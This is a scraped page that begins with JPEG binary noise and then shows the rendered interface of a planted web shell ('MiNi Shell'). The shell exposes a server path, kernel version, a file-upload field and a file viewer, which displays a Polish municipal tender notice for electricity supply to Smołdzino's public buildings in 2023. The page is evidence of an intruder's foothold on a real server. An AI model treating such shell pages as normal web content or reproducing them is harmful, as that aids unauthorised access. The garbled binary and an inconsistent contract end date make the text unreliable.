JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221108/0042735901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Gmina Smołdzino. Kompleksowa dostawa energii elektrycznej do obiektów użyteczności publicznej w okresie od 01.01.2023r. do 31.12.2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000551763</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Smołdzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-214</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598117215</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@smoldzino.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.smoldzino.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Gmina Smołdzino. Kompleksowa dostawa energii elektrycznej do obiektów użyteczności publicznej w okresie od 01.01.2023r. do 31.12.2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a748805-5f44-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00427359</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00205747/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Kompleksowa dostawa energii elektrycznej do obiektów należących do Gminy Smołdzino</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.smoldzino.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z<br/>zastrzeżeniem, że złożenie oferty oraz oświadczeń następuje wyłącznie przy użyciu miniPortalu.<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów<br/>stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP. Za datę przekazania<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań<br/>dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci<br/>papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej<br/>Zamawiającego wskazany w pkt 9 swz.<br/>6. Dane postępowania można wyszukać również na Liście wszystkich postępowań klikając wcześniej<br/>opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>7. Ofertę, sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>8. Złożenie oferty:<br/>a) Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego na miniPortalu. Formularz Oferty jest dostępny dla<br/>wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>z 119 z 04.05.2016, str. 1), dalej zwanego „RODO”, Zamawiający informuje, że:<br/>-administratorem danych osobowych jest Zamawiający, który prowadzi operacje przetwarzania danych osobowych;<br/>-inspektorem danych osobowych u administratora jest. Roman Borowski, e-mail:roan@pro.onet.pl;<br/>-dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego;<br/>-odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 ust. 1 oraz art. 74 ustawy Pzp;<br/>-dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>-obowiązek podania przez Wykonawcę określonych danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego -konsekwencje niepodania określonychdanych wynikają z ustawy Pzp;<br/>-w odniesieniu do danych osobowych, decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>-osoba zainteresowana posiada prawo: dostępu do swoich danych osobowych (art. 15 RODO), do sprostowania danych osobowych<br/>(art. 16 RODO), żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (art. 18 RODO), do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że<br/>przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;<br/>-osobie zainteresowanej nie przysługuje prawo: do usunięcia danych osobowych(w związku z art. 17 ust. 3 lit. b, d lub e RODO),<br/>prawo do przenoszenia danych osobowych (o którym mowa w art. 20 RODO), sprzeciwu (wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO) -art. 21 RODO;<br/>Każdy Wykonawca zainteresowany niniejszym postępowaniem (złożeniem oferty) musi wypełniać obowiązki informacyjne<br/>przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w<br/>celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP1.271.20.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 500000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest kompleksowa dostawa (obejmująca dostawę i świadczenie usług dystrybucji) energii<br/>elektrycznej do 53 PPE o łącznym szacowanym wolumenie 257444 kWh.<br/>2. W 21 obiektach zamontowane są (lub będą do 31.03.2023r i do 31.08.2023r.) mikroinstalacje, a odbiorcy mają (będą<br/>mieć) status Prosumenta.<br/>3. Szczegóły dotyczące zużycia energii elektrycznej w poszczególnych punktach poboru, informacje nt. parametrów<br/>dystrybucji oraz zamontowanych mikroinstalacji opisane zostały w Załączniku nr 1 do SWZ Wykaz punktów poboru.<br/>4. Wskazana w pkt 1 szacowana ilość energii, to ilość jaką zamawiający zamierza nabyć i nie obejmuje energii<br/>wyprodukowanej we własnym zakresie.<br/>5. Realizacja zamówienia odbywać się będzie zgodnie z przepisami ustawy Pe.<br/>6. Wskazane powyżej prognozowane zużycie energii elektrycznej ma charakter orientacyjny i może odbiegać od faktycznie<br/>pobranej, w okresie trwania umowy, ilości energii. Zmniejszenie lub zwiększenie ilości energii elektrycznej nie pociąga dla<br/>zamawiającego (odbiorców) żadnych konsekwencji, poza koniecznością dokonania zapłaty za faktycznie pobraną ilość<br/>energii oraz usługi przesyłu zgodnie z obowiązującą Taryfą OSD. Wykonawca winien uwzględnić wahanie poboru na<br/>poziomie (+/-) 15%.<br/>7. Standardy jakościowe dotyczące energii elektrycznej<br/>1) Przedmiotem zamówienia są dostawy i dystrybucja energii elektrycznej o określonych, zgodnie z obowiązującymi<br/>przepisami, standardach jakościowych.<br/>2) Standardy jakościowe energii elektrycznej opisane są w ustawie z dnia 10 kwietnia 1997r. –Prawo energetyczne oraz w<br/>Rozporządzeniu Ministra Gospodarki z dnia 4 maja 2007r. w sprawie szczegółowych warunków funkcjonowania systemu<br/>elektroenergetycznego (Dz.U. 2007 r. Nr 93, poz. 623 ze zm.). Zasady kształtowania i kalkulacji taryf oraz rozliczeń w<br/>obrocie energią elektryczną określa Rozporządzenie Ministra Energii z dnia 6 marca 2019 r. (Dz.U. 2019 r., poz. 503 ze<br/>zm.);<br/>3) Standardy dotyczące dystrybucji energii elektrycznej zawarte są w Taryfie Operatora, która określa:<br/>a) grupy taryfowe i szczegółowe kryteria kwalifikowania odbiorców do tych grup;<br/>b) sposób ustalania opłat za przyłączenie do sieci Operatora, zaś w przypadku przyłączenia<br/>do sieci o napięciu znamionowym nie wyższym niż 1 kV także ryczałtowe stawki opłat;<br/>c) stawki opłat za świadczenie usługi dystrybucji i warunki ich stosowania, z uwzględnieniem<br/>podziału na stawki wynikające z:<br/>• dystrybucji energii elektrycznej (składniki zmienne i stałe stawki sieciowej),<br/>• korzystania z krajowego systemu elektroenergetycznego (stawki jakościowe),<br/>• odczytywania wskazań układów pomiarowo-rozliczeniowych i ich bieżącej kontroli (stawki abonamentowe),<br/>• przedterminowego rozwiązania kontraktów długoterminowych (stawki opłaty<br/>przejściowej),<br/>• zapewnienia dostępności energii elektrycznej ze źródeł odnawialnych w krajowym systemie elektroenergetycznym (stawka<br/>opłaty OZE),<br/>• zapewnienia średnioterminowego i długoterminowego bezpieczeństwa dostaw energii elektrycznej do odbiorców<br/>końcowych (stawka opłaty mocowej);d) sposób ustalania bonifikat za niedotrzymanie parametrów jakościowych energii<br/>elektrycznej i standardów jakościowych obsługi odbiorców;<br/>e) sposób ustalania opłat za:<br/>• ponadumowny pobór energii biernej,<br/>• przekroczenia mocy umownej,<br/>• nielegalny pobór energii elektrycznej,<br/>f) opłaty za usługi wykonywane na dodatkowe zlecenie odbiorcy;<br/>g) opłaty za wznowienie dostarczania energii elektrycznej po wstrzymaniu jej dostaw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">65310000-9 - Przesył energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Podstawą obliczenia ceny ofertowej jest Formularz oferty (Załącznik nr 2 do SWZ) wraz z<br/>Formularzem cenowym (Załącznik nr 2a do SWZ).<br/>2. Wykonawca może złożyć Ofertę na własnym formularzu, lecz jej treść i układ muszą być zgodne z formularzem załączonym do<br/>niniejszej SWZ.<br/>3. Cena podana w Formularzu oferty stanowi cenę brutto, tj. cenę oferty netto powiększoną o stawkę podatku od towarów i usług<br/>(VAT) 23%.<br/>4. Sposób obliczenia ceny Cenę oferty netto (Cnetto)należy obliczyć wg wzoru:<br/>Cnetto = Zee + Dc<br/>Zee – całkowity koszt zakupu energii elektrycznej netto stanowiący iloczyn ceny jednostkowej energii elektrycznej (uśrednionej, bez<br/>odnoszenia do poszczególnych grup taryfowych) i całkowitego prognozowanego zużycia energii elektrycznej w okresie trwania<br/>umowy [zł] bez wyodrębniania poszczególnych grup taryfowych<br/>Dc – całkowite koszty dystrybucji netto w okresie trwania umowy [zł]<br/>5. W części dotyczącej dystrybucji energii elektrycznej wykonawca wpisuje stawki i opłaty zgodnie z Taryfą OSD zatwierdzoną<br/>Decyzją Prezesa URE i obowiązujące na dzień złożenia oferty.<br/>6. Cena jednostkowa energii elektrycznej zaoferowana przez wykonawcę powinna uwzględniać zysk wykonawcy, oraz wszystkie<br/>inne koszty (w tym opłaty handlowe, koszty bilansowania, podatek akcyzowy) związane z realizacją przedmiotu zamówienia<br/>określonego w niniejszej SWZ, jak również możliwe odchyłki wielkości poboru energii elektrycznej.<br/>7. Cena jednostkowa energii elektrycznej zaoferowana przez wykonawcę będzie niezmienna przez cały okres realizacji umowy (z<br/>zastrzeżeniem zapisów Załącznika nr 7 do SWZ).<br/>8. W trakcie trwania umowy, w odniesieniu do usług dystrybucji, obowiązywać będę stawki<br/>wynikające z zatwierdzonej przez Prezesa URE Taryfy OSD. W przypadku zmian stawek, opłat w związku ze zmianą Taryfy OSD,<br/>do rozliczeń stosowane będą stawki obowiązujące na dany okres rozliczeniowy. Zmiana stawek i opłat w tym zakresie nie będzie<br/>stanowić zmiany Umowy wymagającej podpisania Aneksu.<br/>9. Zamawiający przewiduje rozliczenie tylko w polskich złotych.<br/>10. Cenę oferty należy podać do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu w zakresie:<br/>a) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>b) sytuacji ekonomicznej lub finansowej<br/>c) zdolności technicznej lub zawodowej<br/>2. Wykonawca spełni warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia<br/>działalności gospodarczej jeżeli wykaże:<br/>1) posiadanie uprawnień w zakresie obrotu energią elektryczną, tj. posiadanie ważnej Koncesji<br/>w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji Energetyki<br/>oraz<br/>2) posiadanie uprawnień do prowadzenia działalności gospodarczej w zakresie dystrybucji<br/>energii elektrycznej, tj. posiadanie ważnej Koncesji w zakresie dystrybucji energii elektrycznej<br/>wydanej przez Prezesa Urzędu Regulacji Energetyki, lub jeżeli wykonawca nie jest właścicielem<br/>sieci dystrybucyjnej, posiadanie ważnej Umowy dystrybucji dla usługi kompleksowej zawartej z<br/>Operatorem Systemu Dystrybucyjnego na świadczenie usług dystrybucji energii elektrycznej na<br/>obszarze, na którym znajdują się punkty poboru opisane w Załączniku nr 1 do SWZ, w tym w<br/>zakresie dystrybucji energii elektrycznej wytworzonej w mikroinstalacji.<br/>Warunek zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej.<br/>3. Warunek dotyczący sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w<br/>powyższym zakresie.<br/>4. Wykonawca dotyczący zdolności technicznej lub zawodowej,Zamawiający nie stawia warunku<br/>w powyższym zakresie.<br/>5. Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>7. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>8. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Podmiotowe środki<br/>dowodowe żądane w celu potwierdzenia braku podstaw wykluczeniu (składane<br/>na wezwanie zamawiającego).<br/>W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego wg wzoru stanowiącego Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w 